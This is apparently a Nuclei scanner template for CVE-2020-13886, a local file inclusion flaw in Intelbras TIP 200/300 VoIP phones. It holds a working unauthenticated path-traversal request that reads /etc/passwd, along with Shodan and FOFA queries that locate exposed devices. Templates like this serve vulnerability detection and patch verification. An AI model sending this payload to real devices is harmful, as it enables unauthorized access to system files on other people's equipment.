Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 are vulnerable to local file inclusion via the 'page' parameter in /cgi-bin/cgiServer.exx, allowing unauthenticated attackers to read arbitrary files such as /etc/passwd.
PoC代码[已公开]
id: CVE-2020-13886
info:
name: Intelbras TIP 200/200 LITE/300 - Local File Inclusion
author: ritikchaddha
severity: high
description: |
Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 are vulnerable to local file inclusion via the 'page' parameter in /cgi-bin/cgiServer.exx, allowing unauthenticated attackers to read arbitrary files such as /etc/passwd.
remediation: |
Update the device firmware to the latest version provided by Intelbras.
reference:
- https://lucxs.medium.com/cve-2020-13886-lfi-voip-intelbras-d30f27a39b22
- https://nvd.nist.gov/vuln/detail/CVE-2020-13886
classification:
cve-id: CVE-2020-13886
cwe-id: CWE-22
epss-score: 0.01906
epss-percentile: 0.82622
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
verified: true
max-request: 1
vendor: intelbras
shodan-query: html:"/cgi-bin/cgiServer.exx"
fofa-query: body="/cgi-bin/cgiServer.exx"
tags: cve,cve2020,intelbras,tip200,tip300,lfi
http:
- raw:
- |
GET /cgi-bin/cgiServer.exx?page=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 490a00463044022069f2d0a20c5f5ff8881efa28400a5d3530733e6b12b6bbbbf80db53f27bae12d022077db09ef6388c0994136ac5760386638ac4823bfdd54235e02ae366de4615031:922c64590222798bb761d5b6d8e72950